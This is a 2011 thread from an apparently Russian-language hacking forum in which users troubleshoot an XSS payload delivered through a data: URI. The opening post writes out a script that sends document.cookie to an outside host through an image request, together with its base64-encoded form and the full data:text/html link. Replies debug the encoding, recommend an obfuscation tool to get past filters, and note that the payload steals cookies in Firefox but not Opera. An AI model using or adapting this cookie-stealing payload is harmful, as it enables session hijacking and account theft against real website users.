xss через data

Discussion in 'Песочница' started by qaz, 19 Mar 2011.

  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    Всем привет я тут начал изучать метод хсс через протокала дата и у меня чёт не получилось

    взял
    <script>img = new Image();img.src= "http://сайт.com/1/s.gif?"+document.cookie;</script>

    прекодировал
    PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbWcuc3JjPSAiaHR0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIrZG9jdW1lbnQuY29va2llOzwvc2NyaXB0Pg==

    перешол по ссылке
    data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbWcuc3JjPSAiaHR0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIrZG9jdW1lbnQuY29va2llOzwvc2NyaXB0Pg==

    в ответ полный ноль, почему?(сайт изменино)
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    убрал, непомогло.
    Абсолютно везде надо уберать? Или гдето оставить?
     
    #2 qaz, 19 Mar 2011
    Last edited: 19 Mar 2011
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Возможно у тебя не та кодировка:
    Code:
    <script>img = new Image();img.src= "http://б�аАаЙб�.com/1/s.gif?"+document.cookie;</script>
    
    А так всё у меня работает.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    о, всё заработало, просто кодировщик учитывал пробел после ;</script> который я не заметил, наверно из-за етого и не работало
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    тут маленький вопрос появился, у меня в опере код теперь не работает, а в мозиле пашет, это что получается, в опере дыру прикрыли?
     
  6. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    попробуй обфускацию этим
    http://kaimi.ru/2011/03/crypt-javascript-html-vbs/
     
  7. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Лол :) По сути, это баги не браузера, а сайта.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    сайта? по сути с одних и тех же сайтов с мозилы ворует а с оперы нет
     
  9. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    да да если
    .php то надо чем то другим пробовать шифровать
    если
    .html другим
    я методом тыка пробовал
    бывает что в index.php html кода вообще нет
    то тогда через eval
    здесь по ходи по этой теме
    /threadnav144505-1-10.html
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    та не, думаю ето тут не при чём, вот захожу например сюда / в мозиле вбиваю код и куки записываются, если в опере то записывается только пробел
     
  11. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Просто когда в браузере прикрыта XSS, это навряд-ли можно назвать "Дырой"... Браузер все навсего выполняет скрипты